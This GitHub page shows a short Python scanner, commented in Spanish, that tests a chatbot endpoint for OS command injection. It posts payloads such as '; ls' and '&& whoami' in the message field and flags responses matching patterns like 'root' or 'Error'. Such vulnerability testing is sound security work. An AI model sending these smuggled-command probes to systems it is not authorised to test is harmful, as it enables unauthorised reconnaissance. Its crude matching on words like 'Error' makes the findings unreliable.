-
Notifications
You must be signed in to change notification settings - Fork 0
/
OS Command Injection.py
35 lines (29 loc) · 1.13 KB
/
OS Command Injection.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import requests
import re
def test_os_command_injection(base_url, chat_endpoint):
# Diferentes tipos de payloads para inyección de comandos
payloads = [
"; ls",
"| ls",
"& ls",
"&& ls",
"; whoami",
"| whoami",
"& whoami",
"&& whoami"
]
vulnerable = False
for payload in payloads:
# Enviar el payload al endpoint del chatbot
response = requests.post(base_url + chat_endpoint, data={'message': payload})
content = response.content.decode('utf-8')
# Buscar indicios de una inyección de comandos exitosa
if re.search(r"(root|www-data|command not found|File not found|Error|No such file or directory)", content, re.IGNORECASE):
print(f"Potentially vulnerable to OS Command Injection: {payload}")
vulnerable = True
if not vulnerable:
print("No potential OS Command Injection vulnerabilities detected.")
# Ejemplo de uso
# base_url = "http://example.com"
# chat_endpoint = "/api/chat"
# test_os_command_injection(base_url, chat_endpoint)